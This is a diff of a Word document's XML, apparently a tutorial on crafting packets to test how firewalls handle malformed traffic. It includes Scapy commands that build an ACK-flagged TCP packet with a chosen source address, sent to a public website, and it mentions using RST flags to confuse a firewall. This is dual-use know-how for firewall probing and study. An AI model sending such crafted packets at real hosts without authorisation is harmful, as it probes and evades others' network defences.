-              <v:shape w14:anchorId="277C28C5" id="Text Box 13" o:spid="_x0000_s1030" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:52.2pt;margin-top:14.8pt;width:352.3pt;height:.05pt;z-index:-251627520;visibility:visible;mso-wrap-style:square;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text;v-text-anchor:top" o:gfxdata="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" stroked="f">
-                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
-                  <w:txbxContent>
-                    <w:p>
-                      <w:pPr>
-                        <w:pStyle w:val="Caption"/>
-                        <w:jc w:val="center"/>
-                        <w:rPr>
-                          <w:sz w:val="22"/>
-                        </w:rPr>
-                      </w:pPr>
-                      <w:r>
-                        <w:rPr>
-                          <w:sz w:val="22"/>
-                        </w:rPr>
-                        <w:t xml:space="preserve">Figure </w:t>
-                      </w:r>
-                      <w:r>
-                        <w:rPr>
-                          <w:sz w:val="22"/>
-                        </w:rPr>
-                        <w:t>1</w:t>
-                      </w:r>
-                      <w:r>
-                        <w:rPr>
-                          <w:sz w:val="22"/>
-                        </w:rPr>
-                        <w:t xml:space="preserve">. </w:t>
-                      </w:r>
-                      <w:r>
-                        <w:rPr>
-                          <w:sz w:val="22"/>
-                        </w:rPr>
-                        <w:t>A basic Ethernet and TCP</w:t>
-                      </w:r>
-                      <w:r>
-                        <w:rPr>
-                          <w:sz w:val="22"/>
-                        </w:rPr>
-                        <w:t>/</w:t>
-                      </w:r>
-                      <w:r>
-                        <w:rPr>
-                          <w:sz w:val="22"/>
-                        </w:rPr>
-                        <w:t>IP packet</w:t>
-                      </w:r>
-                    </w:p>
-                  </w:txbxContent>
-                </v:textbox>
-                <w10:wrap type="tight"/>
-              </v:shape>
-            </w:pict>
-          </mc:Fallback>
-        </mc:AlternateContent>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-        </w:rPr>
-        <w:br w:type="page"/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="24"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>P</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="24"/>
-        </w:rPr>
-        <w:t>acket crafting techniques:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="21"/>
-        </w:numPr>
-        <w:rPr>
-          <w:sz w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="24"/>
-        </w:rPr>
-        <w:t>Ping fragmentation</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="21"/>
-        </w:numPr>
-        <w:rPr>
-          <w:sz w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="24"/>
-        </w:rPr>
-        <w:t>Packet flag manipulation</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="21"/>
-        </w:numPr>
-        <w:rPr>
-          <w:sz w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="24"/>
-        </w:rPr>
-        <w:t>Packet duplication</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="21"/>
-        </w:numPr>
-        <w:rPr>
-          <w:sz w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="24"/>
-        </w:rPr>
-        <w:t>Protocol manipulation</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="21"/>
-        </w:numPr>
-        <w:rPr>
-          <w:sz w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="24"/>
-        </w:rPr>
-        <w:t>Half open packets</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="24"/>
-        </w:rPr>
-        <w:t>We will be mainly focusing on packet flag manipulation and half open packets. The steps are:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="24"/>
-        </w:rPr>
-        <w:t>Step 1: Lay of the land</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="HTMLPreformatted"/>
-        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        <w:rPr>
-          <w:color w:val="000000"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <mc:AlternateContent>
-          <mc:Choice Requires="wps">
-            <w:drawing>
-              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251692032" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="70B39B52" wp14:editId="7606156A">
-                <wp:simplePos x="0" y="0"/>
-                <wp:positionH relativeFrom="column">
-                  <wp:posOffset>1112520</wp:posOffset>
-                </wp:positionH>
-                <wp:positionV relativeFrom="paragraph">
-                  <wp:posOffset>4168140</wp:posOffset>
-                </wp:positionV>
-                <wp:extent cx="4474210" cy="635"/>
-                <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
-                <wp:wrapTight wrapText="bothSides">
-                  <wp:wrapPolygon edited="0">
-                    <wp:start x="0" y="0"/>
-                    <wp:lineTo x="0" y="21102"/>
-                    <wp:lineTo x="21520" y="21102"/>
-                    <wp:lineTo x="21520" y="0"/>
-                    <wp:lineTo x="0" y="0"/>
-                  </wp:wrapPolygon>
-                </wp:wrapTight>
-                <wp:docPr id="3" name="Text Box 3"/>
                 <wp:cNvGraphicFramePr/>
                 <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                   <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
@@ -2786,7 +3847,7 @@
           </mc:Choice>
           <mc:Fallback>
             <w:pict>
-              <v:shape w14:anchorId="70B39B52" id="Text Box 3" o:spid="_x0000_s1031" type="#_x0000_t202" style="position:absolute;margin-left:87.6pt;margin-top:328.2pt;width:352.3pt;height:.05pt;z-index:-251624448;visibility:visible;mso-wrap-style:square;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text;v-text-anchor:top" o:gfxdata="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" stroked="f">
+              <v:shape w14:anchorId="277C28C5" id="Text Box 13" o:spid="_x0000_s1030" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:52.2pt;margin-top:14.8pt;width:352.3pt;height:.05pt;z-index:-251627520;visibility:visible;mso-wrap-style:square;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text;v-text-anchor:top" o:gfxdata="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" stroked="f">
                 <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                   <w:txbxContent>
                     <w:p>
@@ -2836,9 +3897,304 @@
           </mc:Fallback>
         </mc:AlternateContent>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+        </w:rPr>
+        <w:br w:type="page"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>P</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>acket crafting techniques:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="21"/>
+        </w:numPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>Ping fragmentation</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="21"/>
+        </w:numPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>Packet flag manipulation</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="21"/>
+        </w:numPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>Packet duplication</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="21"/>
+        </w:numPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>Protocol manipulation</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="21"/>
+        </w:numPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>Half open packets</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>We will be mainly focusing on packet flag manipulation and half open packets. The steps are:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>Step 1: Lay of the land</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:rPr>
+          <w:color w:val="000000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:noProof/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <mc:AlternateContent>
+          <mc:Choice Requires="wps">
+            <w:drawing>
+              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251692032" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="70B39B52" wp14:editId="7606156A">
+                <wp:simplePos x="0" y="0"/>
+                <wp:positionH relativeFrom="column">
+                  <wp:posOffset>1112520</wp:posOffset>
+                </wp:positionH>
+                <wp:positionV relativeFrom="paragraph">
+                  <wp:posOffset>4168140</wp:posOffset>
+                </wp:positionV>
+                <wp:extent cx="4474210" cy="635"/>
+                <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
+                <wp:wrapTight wrapText="bothSides">
+                  <wp:wrapPolygon edited="0">
+                    <wp:start x="0" y="0"/>
+                    <wp:lineTo x="0" y="21102"/>
+                    <wp:lineTo x="21520" y="21102"/>
+                    <wp:lineTo x="21520" y="0"/>
+                    <wp:lineTo x="0" y="0"/>
+                  </wp:wrapPolygon>
+                </wp:wrapTight>
+                <wp:docPr id="3" name="Text Box 3"/>
+                <wp:cNvGraphicFramePr/>
+                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
+                    <wps:wsp>
+                      <wps:cNvSpPr txBox="1"/>
+                      <wps:spPr>
+                        <a:xfrm>
+                          <a:off x="0" y="0"/>
+                          <a:ext cx="4474210" cy="635"/>
+                        </a:xfrm>
+                        <a:prstGeom prst="rect">
+                          <a:avLst/>
+                        </a:prstGeom>
+                        <a:solidFill>
+                          <a:prstClr val="white"/>
+                        </a:solidFill>
+                        <a:ln>
+                          <a:noFill/>
+                        </a:ln>
+                      </wps:spPr>
+                      <wps:txbx>
+                        <w:txbxContent>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="Caption"/>
+                              <w:jc w:val="center"/>
+                              <w:rPr>
+                                <w:sz w:val="22"/>
+                              </w:rPr>
+                            </w:pPr>
+                            <w:r>
+                              <w:rPr>
+                                <w:sz w:val="22"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve">Figure </w:t>
+                            </w:r>
+                            <w:r>
+                              <w:rPr>
+                                <w:sz w:val="22"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve">2. </w:t>
+                            </w:r>
+                            <w:r>
+                              <w:rPr>
+                                <w:sz w:val="22"/>
+                              </w:rPr>
+                              <w:t>Firewall drops</w:t>
+                            </w:r>
+                          </w:p>
+                        </w:txbxContent>
+                      </wps:txbx>
+                      <wps:bodyPr rot="0" spcFirstLastPara="0" vertOverflow="overflow" horzOverflow="overflow" vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" numCol="1" spcCol="0" rtlCol="0" fromWordArt="0" anchor="t" anchorCtr="0" forceAA="0" compatLnSpc="1">
+                        <a:prstTxWarp prst="textNoShape">
+                          <a:avLst/>
+                        </a:prstTxWarp>
+                        <a:spAutoFit/>
+                      </wps:bodyPr>
+                    </wps:wsp>
+                  </a:graphicData>
+                </a:graphic>
+              </wp:anchor>
+            </w:drawing>
+          </mc:Choice>
+          <mc:Fallback>
+            <w:pict>
+              <v:shape w14:anchorId="70B39B52" id="Text Box 3" o:spid="_x0000_s1031" type="#_x0000_t202" style="position:absolute;margin-left:87.6pt;margin-top:328.2pt;width:352.3pt;height:.05pt;z-index:-251624448;visibility:visible;mso-wrap-style:square;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text;v-text-anchor:top" o:gfxdata="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" stroked="f">
+                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
+                  <w:txbxContent>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="Caption"/>
+                        <w:jc w:val="center"/>
+                        <w:rPr>
+                          <w:sz w:val="22"/>
+                        </w:rPr>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:sz w:val="22"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve">Figure </w:t>
+                      </w:r>
+                      <w:r>
+                        <w:rPr>
+                          <w:sz w:val="22"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve">2. </w:t>
+                      </w:r>
+                      <w:r>
+                        <w:rPr>
+                          <w:sz w:val="22"/>
+                        </w:rPr>
+                        <w:t>Firewall drops</w:t>
+                      </w:r>
+                    </w:p>
+                  </w:txbxContent>
+                </v:textbox>
+                <w10:wrap type="tight"/>
+              </v:shape>
+            </w:pict>
+          </mc:Fallback>
+        </mc:AlternateContent>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:noProof/>
           <w:sz w:val="24"/>
           <w:szCs w:val="22"/>
         </w:rPr>
@@ -2876,7 +4232,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId10">
+                    <a:blip r:embed="rId11">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -2919,55 +4275,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:t xml:space="preserve">We test </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>firewall</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>s</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> respons</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>e</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> to malformed packets</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>:</w:t>
+        <w:t>We test firewalls response to malformed packets:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3027,53 +4335,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:t xml:space="preserve">&gt;&gt;&gt; </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>ip</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> = </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>IP(</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>src</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> = "10.10.10.2",dst = "www.geeksforgeeks.org")</w:t>
+        <w:t>&gt;&gt;&gt; ip = IP(src = "10.10.10.2",dst = "www.geeksforgeeks.org")</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3092,79 +4354,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:t xml:space="preserve">&gt;&gt;&gt; </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>tcp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> = TCP(</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>dport</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>=</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>80,sport</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>=1500,flags="A",</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>seq</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>=111)</w:t>
+        <w:t>&gt;&gt;&gt; tcp = TCP(dport=80,sport=1500,flags="A",seq=111)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3183,36 +4373,8 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:t xml:space="preserve">&gt;&gt;&gt; p = </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>ip</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>tcp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>&gt;&gt;&gt; p = ip/tcp</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3230,25 +4392,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:t xml:space="preserve">&gt;&gt;&gt; </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>ans</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> = sr1(p)</w:t>
+        <w:t>&gt;&gt;&gt; ans = sr1(p)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3349,15 +4493,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>setting the reset R</w:t>
+        <w:t xml:space="preserve"> setting the reset R</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3387,31 +4523,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:t xml:space="preserve">By </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve">setting the reset R flags </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>we</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> confuse the </w:t>
+        <w:t xml:space="preserve">By setting the reset R flags we confuse the </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3512,25 +4624,13 @@
                               <w:rPr>
                                 <w:sz w:val="22"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">1. </w:t>
+                              <w:t xml:space="preserve">3. </w:t>
                             </w:r>
                             <w:r>
                               <w:rPr>
                                 <w:sz w:val="22"/>
                               </w:rPr>
-                              <w:t>A basic Ethernet and TCP</w:t>
-                            </w:r>
-                            <w:r>
-                              <w:rPr>
-                                <w:sz w:val="22"/>
-                              </w:rPr>
-                              <w:t>/</w:t>
-                            </w:r>
-                            <w:r>
-                              <w:rPr>
